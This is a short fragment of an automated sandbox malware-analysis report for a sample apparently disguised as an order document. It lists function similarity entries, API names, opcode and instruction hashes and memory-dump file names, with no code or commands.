                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$Flst
                                                                  • API String ID: 0-758220159
                                                                  • Opcode ID: 603db50c7829de06e75d29bade7c716d6a857da10071de63e40695313dd5c9c0
                                                                  • Instruction ID: 3350f49c1817ef1f0b5721acaa7c20f57796389eb892a5152c694fdd469762df
                                                                  • Opcode Fuzzy Hash: 603db50c7829de06e75d29bade7c716d6a857da10071de63e40695313dd5c9c0
                                                                  • Instruction Fuzzy Hash: B451AEB5E002488FEB24DF99C48476DFBF5EF44798F95842AD8499B350EBB09985CF80
                                                                  Function 32D2DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0$0
                                                                  • API String ID: 3446177414-203156872
                                                                  • Opcode ID: 56057691a24c2cb1123d59cea25b6ed5571881a737c4278075f9ce48c55109e1
                                                                  • Instruction ID: 5386e924610ff6e06f0b96c2d7801b18ac5431adaea3071d8cab856d3762c21a
                                                                  • Opcode Fuzzy Hash: 56057691a24c2cb1123d59cea25b6ed5571881a737c4278075f9ce48c55109e1
                                                                  • Instruction Fuzzy Hash: 75415EB56087459FD300CF28C544A56BBE4BF8C758F14492EF888DB341D771E905CB96